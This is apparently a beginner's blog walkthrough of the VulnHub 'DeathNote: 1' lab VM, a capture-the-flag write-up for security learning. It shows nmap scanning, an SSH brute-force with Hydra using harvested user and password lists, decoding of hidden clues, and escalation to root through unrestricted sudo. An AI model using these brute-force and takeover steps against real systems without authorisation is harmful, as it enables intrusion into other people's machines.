VULNHUB DEATHNOTE: 1 WALKTHROUGH

![deathnote4](https://hackmd.io/_uploads/HkIRPr7DA.gif) **Hello, fr13nds** # VULNHUB DEATHNOTE: 1 WALKTHROUGH This is my first article in which I'll ***pwn*** the machine ***DeathNote1*** provided by vulnhub. ``DeathNote: 1`` is a beginner - friendly vulnerable machine available on vulnhub, a platform that provides intentionally vulnerable systems for educational purposes in cybersecurity. It's an easy machine based on the anime character ``DeathNote``. For more information about the machine, check [DeathNote: 1](https://www.vulnhub.com/entry/deathnote-1,739/) Now, let's download the ``.OVA file``. Before you go ahead to download the ``.OVA file``, make sure you have a virtual machine installed on your operating system, preferably ``Oracle VM Virtual Box`` and also a linux distro installed in ``virtualbox``. For this writeup, I'll use [kali linux 2024.3](https://kali.org). ![Screenshot 1](https://hackmd.io/_uploads/Syfl_qzD0.png) Now, after downloading the ``.OVA file``, go to ``virtualbox``, at the top leftmost part, select ``File``, then click ``Import Appliance``, as shown in the screenshot below; ![Screenshot 2](https://hackmd.io/_uploads/S1LYK9zw0.jpg) On clicking ``Import Appliance``, navigate to the location of the downloaded ``OVA file`` and select it. Follow the on - screen instructions and leave everything as default. More importantly, configure the ``DeathNote`` machine to be on the same network as the attacking machine, ``Kali linux`` which is ``NAT Network`` in my own case. This is to allow them to communicate with each other as if they were on a physical local network. ![Screenshot 4](https://hackmd.io/_uploads/HyOQC9GPR.png) Congratulations! We are done with the configuration process. Now, let's start both machines and head up to our kali machine to begin hacking... ![hacking](https://hackmd.io/_uploads/B1PQKH7PC.gif) ### Target Identification Let's get the IP address of the target machine, which is the ``deathnote`` machine using the ``netdisocover`` utility on kali linux. ``` ┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote] └─$ sudo netdiscover ``` ![Screenshot (deathnote1)](https://hackmd.io/_uploads/SyTdryVwC.png) *The IP address of the target is 192.168.10.9* ### Initial Enumeration & Service Enumeration Next, we run a basic nmap scan to enumerate the open ports and service version ``` ┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote] └─$ nmap -sV 192.168.10.9 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-03 12:09 WAT Nmap scan report for 192.168.10.9 Host is up (0.47s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 08:00:27:83:9C:59 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds ``` *From the Nmap scan, we can see that SSH and HTTP are open which runs on port 22 and port 80 respectively* Next, we enumerate the web server by typing ``http://"the IP address of the target machine"`` on the web browser. On doing this, we get an error. Now,to solve that error, you need to edit the ``/etc/hosts`` file on kali using the following command: ``` ┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote] └─$ sudo nano /etc/hosts ``` Then, add the IP address of the vulnerable machine to ``/etc/hosts`` file. Refresh the webpage and you should get a wordpress site. ![Screenshot (deathnote2)](https://hackmd.io/_uploads/Bk0hBkEDR.png) From the webpage, we get a lot of information of which some may be useful. That is left for us to figure out. We get two possible usernames which are ``kira`` and ``L``. On clicking the ``Hint`` icon, we are taken to another page, ``a hint page``.On the ``hint`` page, we see a ``FInd a notes.txt file on server`` or ``See the L comment``. When we scroll again, we get a possible password which is in a comment made by ``L`` ![Screenshot (deathnote3)](https://hackmd.io/_uploads/SJ1gLyVPR.png) ![Screenshot (deathnote4)](https://hackmd.io/_uploads/BJW7IkEvA.png) This is some useful information. Let's further dig. ==Good reconnaissance is key in exploitation==. Now, let's check the ``/robots.txt`` path. We get another path ``/important.jpg``. I thought to myself, this path must be nice but haha, nothing much there, just additional information about our target. ``Ps: The file extension isn't an image but a collection of different texts`` ![Screenshot (deathnote5)](https://hackmd.io/_uploads/Bkg581NDC.png) We use the ``curl`` command to get data from the image ``important.jpg`` ``` ┌──(g0df4th3r㉿kali)-[~/vulnhub/deathnote] └─$ curl http://192.168.10.9/important.jpg i am Soichiro Yagami, light's father i have a doubt if L is true about the assumption that light is kira i can only help you by giving something important login username : user.txt i don't know the password. find it by yourself but i think it is in the hint section of site ``` This information tells us that ``user.txt`` can be used as a wordlist for usernames and ``notes.txt`` can be used as a passwordlist. Now, let's go back to the wordpress site and right click to ``view page source``, to see if we can get any leads. On viewing the page source, we get a directory ``/wordpress/wp-content/uploads/2021/07``. Let's go ahead to check it out! ![Screenshot (deathnote6)](https://hackmd.io/_uploads/BJfRLyEv0.png) ![Screenshot (deathnote7)](https://hackmd.io/_uploads/HJUew1VDR.png) On checking it, we get ``notes.txt`` and ``user.txt``. ``` death4 death4life death4u death4ever death4all death420 death45 death4love death49 death48 death456 death4014 1death4u yaydeath44 thedeath4u2 thedeath4u stickdeath420 reddeath44 megadeath44 megadeath4 killdeath405 hot2death4sho death4south death4now death4l0ve death4free death4elmo death4blood death499Eyes301 death498 death4859 death47 death4545 death445 death444 death4387n death4332387 death42521439 death42 death4138 death411 death405 death4me ``` ``` KIRA L ryuk rem misa siochira light takada near mello l kira RYUK REM SIOCHIRA LIGHT NEAR ``` Now, this is some useful information. We will use this information to bruteforce login to the target machine using a popular password cracking tool, ``Hydra``. ``` ┌──(g0df4th3r㉿kali)-[~/Desktop] └─$ hydra -L user.txt -P notes.txt ssh://192.168.10.9 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-04 08:30:51 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 792 login tries (l:18/p:44), ~50 tries per task [DATA] attacking ssh://192.168.10.9:22/ [STATUS] 235.00 tries/min, 235 tries in 00:01h, 560 to do in 00:03h, 13 active [22][ssh] host: 192.168.10.9 login: l password: death4me ``` We got a valid password that matches a username. That is some good news! Let's go ahead to SSH into the target machine but before we do that, let's go through the command. #### Explanation of the command ``L user`` : Specifiesthe file ``user.txt`` containing a list of usernames to try. ``-P notes.txt`` : Specifies the file ``notes.txt`` containing a list of passwords to try. ``ssh://192.168.10.9`` : The target service (SSH) and the IP address of the target machine. ``` ┌──(g0df4th3r㉿kali)-[~/Desktop] └─$ ssh l@192.168.10.9 l@192.168.10.9's password: Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Jul 3 18:39:29 2024 from 192.168.10.4 l@deathnote:~$ whoami l ``` We succesfully logged in. Now,let's list the services running on the machine to see if we can get any fruit. We get a text file, ``user.txt``. On viewing it, we see an esoteric language, most likely known as ``Brainfuck``. ``` l@deathnote:~$ ls user.txt l@deathnote:~$ cat user.txt ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------. ``` When we deocde this using any free online brainfuck compiler, we get this message; ```i think u got the shell , but you wont be able to kill me -kira ``` This doesn't give us any useful information. Remember, we found ``/opt`` directory earlier. Let's see what is in there. We get a ``case.wav`` file and a ``hint``. On viewing the ``case.wav`` file, we get; ``` l@deathnote:/opt/L/fake-notebook-rule$ cat case.wav 63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d ``` ``` l@deathnote:/opt/L/fake-notebook-rule$ cat hint use cyberchef ``` From the ``case.wav`` file, we get a hexadecimal string. Let's decode that using cyberchef. On decoding, we get a ``base 64`` string. When we further decode, we get ``passwd : kiraisevil`` as seen in the screenshot below; ![Screenshot (deathnote10)](https://hackmd.io/_uploads/By_rDkED0.png) ![Screenshot (deathnote11)](https://hackmd.io/_uploads/H1VPvJEDA.png) This seems to be the password for the user, ``kira``. Now, let's switch user to ``kira`` ``` l@deathnote:/opt/L/fake-notebook-rule$ su -l kira Password: kira@deathnote:~$ id uid=1001(kira) gid=1001(kira) groups=1001(kira),27(sudo) ``` Beautiful! Now, we are in the shell of the user ``kira``. Let's switch it up to see if we can escalate any privileges. ``` kira@deathnote:~$ sudo -l [sudo] password for kira: Matching Defaults entries for kira on deathnote: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User kira may run the following commands on deathnote: (ALL : ALL) ALL kira@deathnote:~$ sudo su -l ``` Awesome! ``kira`` can execute anything as any user. This tells us to more wokr, as we can get the root shell using the command ``sudo su -l`` ``` root@deathnote:~# ls root.txt root@deathnote:~# cat root.txt :::::::: :::::::: :::: ::: :::::::: ::::::::: ::: ::::::::::: :::::::: :+: :+: :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +#+ +#+ +:+ +#+ +:+ +#+ :#: +#++:++#: +#++:++#++: +#+ +#++:++#++ +#+ +#+ +#+ +#+ +#+#+# +#+ +#+# +#+ +#+ +#+ +#+ +#+ +#+ #+# #+# #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# #+# #+# ######## ######## ### #### ######## ### ### ### ### ### ######## ##########follow me on twitter###########3 and share this screen shot and tag @KDSAMF root@deathnote:~# ``` We got a text file ``root.txt`` and on viewing the content, we are greeted with ==Congrats== Voila! That was easy, right? We were able to gain root access and ``pwn`` the DeathNote1 machine. Hope you found this write-up interesting! Thanks for reading. Cheers :) Let's connect on [Linkedin](https://www.linkedin.com/in/gideon-chukwuka) ![anime-hacking](https://hackmd.io/_uploads/H178YyEDC.gif)